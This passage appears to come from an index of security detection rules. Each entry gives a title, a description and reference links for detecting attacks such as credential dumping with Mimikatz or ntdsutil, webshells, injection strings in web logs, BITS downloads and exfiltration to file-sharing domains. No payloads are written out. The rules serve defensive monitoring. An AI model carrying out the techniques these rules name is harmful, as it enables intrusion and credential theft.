https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ |
APT User Agent |
Detects suspicious user agent strings used in APT malware in proxy logs |
Internal Research |
Suspicious Base64 Encoded User-Agent |
Detects suspicious encoded User-Agent strings, as seen used by some malware. |
https://deviceatlas.com/blog/list-of-user-agent-strings#desktop |
Bitsadmin to Uncommon IP Server Address |
Detects Bitsadmin connections to IP addresses instead of FQDNs |
https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027 |
Bitsadmin to Uncommon TLD |
Detects Bitsadmin connections to domains with uncommon TLDs |
https://twitter.com/jhencinski/status/1102695118455349248, https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ |
Crypto Miner User Agent |
Detects suspicious user agent strings used by crypto miners in proxy logs |
https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65, https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h |
HTTP Request With Empty User Agent |
Detects a potentially suspicious empty user agent string in proxy logs.
Could potentially indicate an uncommon request method.
|
https://twitter.com/Carlos_Perez/status/883455096645931008 |
Exploit Framework User Agent |
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs |
https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ |
Hack Tool User Agent |
Detects suspicious user agent strings used by hack tools in proxy logs |
https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb, http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules |
Malware User Agent |
Detects suspicious user agent strings used by malware in proxy logs |
http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules, http://www.botopedia.org/search?searchword=scan&searchphrase=all, https://networkraptor.blogspot.com/2015/01/user-agent-strings.html, https://perishablepress.com/blacklist/ua-2013.txt, https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents, https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q, https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large, https://twitter.com/crep1x/status/1635034100213112833 |
Windows PowerShell User Agent |
Detects Windows PowerShell Web Access |
https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest |
Rclone Activity via Proxy |
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string |
https://rclone.org/, https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone |
Suspicious User Agent |
Detects suspicious malformed user agent strings in proxy logs |
https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb |
Potential Base64 Encoded User-Agent |
Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding. |
https://blogs.jpcert.or.jp/en/2022/07/yamabot.html, https://deviceatlas.com/blog/list-of-user-agent-strings#desktop |
Suspicious External WebDAV Execution |
Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
|
https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html, https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html |
F5 BIG-IP iControl Rest API Command Execution - Webserver |
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP |
https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 |
Successful IIS Shortname Fuzzing Scan |
When IIS uses an old .NET Framework, it is possible to enumerate folders using the "~" symbol |
https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml, https://www.exploit-db.com/exploits/19525, https://github.com/lijiejie/IIS_shortname_Scanner |
Java Payload Strings |
Detects possible Java payloads in web access logs |
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/, https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/, https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md, https://twitter.com/httpvoid0x2f/status/1532924261035384832, https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035 |
JNDIExploit Pattern |
Detects exploitation attempt using the JNDI-Exploit-Kit |
https://github.com/pimps/JNDI-Exploit-Kit, https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit |
Path Traversal Exploitation Attempts |
Detects path traversal exploitation attempts |
https://github.com/projectdiscovery/nuclei-templates, https://book.hacktricks.xyz/pentesting-web/file-inclusion |
Source Code Enumeration Detection by Keyword |
Detects source code enumeration that uses GET requests, by keyword searches in URL strings |
https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html, https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1 |
SQL Injection Strings In URI |
Detects potential SQL injection attempts via GET requests in access logs. |
https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/, https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/, https://brightsec.com/blog/sql-injection-payloads/, https://github.com/payloadbox/sql-injection-payload-list, https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection |
Server Side Template Injection Strings |
Detects SSTI attempts sent via GET requests in access logs |
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection, https://github.com/payloadbox/ssti-payloads |
Suspicious User-Agents Related To Recon Tools |
Detects known suspicious (default) user-agents related to scanning/recon tools |
https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb, https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst, https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92 |
Suspicious Windows Strings In URI |
Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ |
Webshell ReGeorg Detection Via Web Logs |
Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. |
https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3, https://github.com/sensepost/reGeorg |
Windows Webshell Strings |
Detects common commands used in Windows webshells |
https://bad-jubies.github.io/RCE-NOW-WHAT/, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Cross Site Scripting Strings |
Detects XSS attempts injected via GET requests in access logs |
https://github.com/payloadbox/xss-payload-list, https://portswigger.net/web-security/cross-site-scripting/contexts |
Mimikatz Use |
This method detects Mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions that are, however, still used by different threat groups) |
https://tools.thehacker.recipes/mimikatz/modules |
Microsoft Malware Protection Engine Crash |
This rule detects a suspicious crash of the Microsoft Malware Protection Engine |
https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344 |
Potential Credential Dumping Via WER - Application |
Detects a Windows Error Reporting event where the process that crashed is lsass. This could be the result of an intentional crash by techniques such as Lsass-Shtinkering to dump credentials |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55 |
Ntdsutil Abuse |
Detects potential abuse of ntdsutil to dump ntds.dit database |
https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) |
Dump Ntds.dit To Suspicious Location |
Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location |
https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) |
Audit CVE Event |
Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited.
MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability).
Unfortunately, that is about the only instance of CVEs being written to this log.
|
https://twitter.com/VM_vivisector/status/1217190929330655232, https://twitter.com/DidierStevens/status/1217533958096924676, https://twitter.com/FlemmingRiis/status/1217147415482060800, https://www.youtube.com/watch?v=ebmW42YYveI, https://nullsec.us/windows-event-log-audit-cve/ |
Backup Catalog Deleted |
Detects backup catalog deletions |
https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 |
Application Uninstalled |
An application has been removed. Check if it is critical. |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml, https://learn.microsoft.com/en-us/windows/win32/msi/event-logging |
Restricted Software Access By SRP |
Detects access to applications restricted by Software Restriction Policies (SRP) |
https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
MSI Installation From Suspicious Locations |
Detects MSI package installation from suspicious locations |
https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html |
MSI Installation From Web |
Detects installation of a remote MSI file from the web. |
https://twitter.com/_st0pp3r_/status/1583922009842802689 |
Atera Agent Installation |
Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators |
https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent |
MSSQL Add Account To Sysadmin Role |
Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ |
MSSQL Disable Audit Settings |
Detects when an attacker executes the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statement in order to delete or disable audit logs on the server |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16, https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16 |
MSSQL Server Failed Logon |
Detects failed logon attempts from clients to MSSQL server. |
https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html |
MSSQL Server Failed Logon From External Network |
Detects failed logon attempts from clients with an external network IP to an MSSQL server. This can be a sign of a brute-force attack. |
https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html |
MSSQL SPProcoption Set |
Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 |
MSSQL XPCmdshell Suspicious Execution |
Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands |
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
MSSQL XPCmdshell Option Change |
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
|
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Relevant Anti-Virus Signature Keywords In Application Log |
Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
|
https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31, https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed, https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01, https://www.nextron-systems.com/?s=antivirus |
Remote Access Tool - ScreenConnect Command Execution |
Detects command execution via ScreenConnect RMM |
https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467 |
Remote Access Tool - ScreenConnect File Transfer |
Detects files being transferred via ScreenConnect RMM |
https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467 |
Microsoft Malware Protection Engine Crash - WER |
This rule detects a suspicious crash of the Microsoft Malware Protection Engine |
https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344 |
File Was Not Allowed To Run |
Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker, https://nxlog.co/documentation/nxlog-user-guide/applocker.html |
Sysinternals Tools AppX Versions Execution |
Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as PsExec and ProcDump while avoiding detection based on system paths |
Internal Research |
Deployment AppX Package Was Blocked By AppLocker |
Detects an appx package deployment that was blocked by AppLocker policy |
https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
Potential Malicious AppX Package Installation Attempts |
Detects potential installation or installation attempts of known malicious appx packages |
https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/ |
Deployment Of The AppX Package Was Blocked By The Policy |
Detects an appx package deployment that was blocked by the local computer policy |
https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv |
Suspicious AppX Package Installation Attempt |
Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious Remote AppX Package Locations |
Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain. |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious AppX Package Locations |
Detects an appx package added to the pipeline of the "to be processed" packages which is located in a suspicious location |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Uncommon AppX Package Locations |
Detects an appx package added to the pipeline of the "to be processed" packages which is located in an uncommon location |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ |
Suspicious Digital Signature Of AppX Package |
Detects execution of AppX packages with a known suspicious or malicious signature |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
New BITS Job Created Via Bitsadmin |
Detects the creation of a new BITS job by Bitsadmin |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
New BITS Job Created Via PowerShell |
Detects the creation of a new BITS job by PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
BITS Transfer Job Downloading File Potential Suspicious Extension |
Detects a new BITS transfer job saving local files with potentially suspicious extensions |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
BITS Transfer Job Download From File Sharing Domains |
Detects BITS transfer job downloading files from a file sharing domain. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
BITS Transfer Job Download From Direct IP |
Detects a BITS transfer job downloading file(s) from a direct IP address. |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
BITS Transfer Job With Uncommon Or Suspicious Remote TLD |
Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832 |
BITS Transfer Job Download To Potential Suspicious Folder |
Detects a new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
Certificate Private Key Acquired |
Detects when an application acquires a certificate private key |
https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Certificate Exported From Local Certificate Store |
Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. |
https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation |
Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation. |
https://twitter.com/SBousseaden/status/1483810148602814466, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations |
CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked |
Detects block events for files that are disallowed by code integrity for protected processes |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Blocked Image/Driver Load For Policy Violation |
Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. |
https://twitter.com/wdormann/status/1590434950335320065, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations |
CodeIntegrity - Blocked Driver Load With Revoked Certificate |
Detects blocked load attempts of revoked drivers |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Revoked Kernel Driver Loaded |
Detects the load of a revoked kernel driver |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Blocked Image Load With Revoked Certificate |
Detects blocked image load events with revoked certificates by code integrity. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Revoked Image Loaded |
Detects image load events with revoked certificates by code integrity. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unsigned Kernel Module Loaded |
Detects the presence of a loaded unsigned kernel module on the system. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unsigned Image Loaded |
Detects loaded unsigned image on the system |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module |
Detects loaded kernel modules that did not meet the WHQL signing requirements. |
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research |
Loading Diagcab Package From Remote Path |
Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability |
https://twitter.com/nas_bench/status/1539679555908141061, https://twitter.com/j00sean/status/1537750439701225472 |
DNS Query for Anonfiles.com Domain - DNS Client |
Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes |
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
DNS Query To MEGA Hosting Website - DNS Client |
Detects DNS queries for subdomains related to the MEGA sharing website |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
DNS Query To Put.io - DNS Client |
Detects DNS queries for subdomains related to "Put.io" sharing website. |
https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure |
Query Tor Onion Address - DNS Client |
Detects DNS resolution of an .onion address related to Tor routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
DNS Query To Ufile.io - DNS Client |
Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
Suspicious Cobalt Strike DNS Beaconing - DNS Client |
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
Failed DNS Zone Transfer |
Detects when a DNS zone transfer failed. |
https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp |
DNS Server Error Failed Loading the ServerLevelPluginDLL |
Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx, https://twitter.com/gentilkiwi/status/861641945944391680 |
USB Device Plugged |
Detects plugged/unplugged USB devices |
https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/, https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/ |
Uncommon New Firewall Rule Added In Windows Firewall Exception List |
Detects when a rule has been added to the Windows Firewall exception list |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application |
Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10), https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# |
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE |
Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule". |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
All Rules Have Been Deleted From The Windows Firewall Configuration |
Detects when all the rules have been deleted from the Windows Defender Firewall configuration |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
A Rule Has Been Deleted From The Windows Firewall Exception List |
Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
The Windows Defender Firewall Service Failed To Load Group Policy |
Detects activity when the Windows Defender Firewall service failed to load Group Policy |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Windows Defender Firewall Has Been Reset To Its Default Configuration |
Detects activity when Windows Defender Firewall has been reset to its default configuration |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Windows Firewall Settings Have Been Changed |
Detects activity when the settings of the Windows firewall have been changed |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
ETW Logging/Processing Option Disabled On IIS Server |
Detects changes to the IIS server configuration in order to disable/remove the ETW logging/processing option. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/ |
HTTP Logging Disabled On IIS Server |
Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging |
New Module Added To IIS Server |
Detects the addition of a new module to an IIS server. |
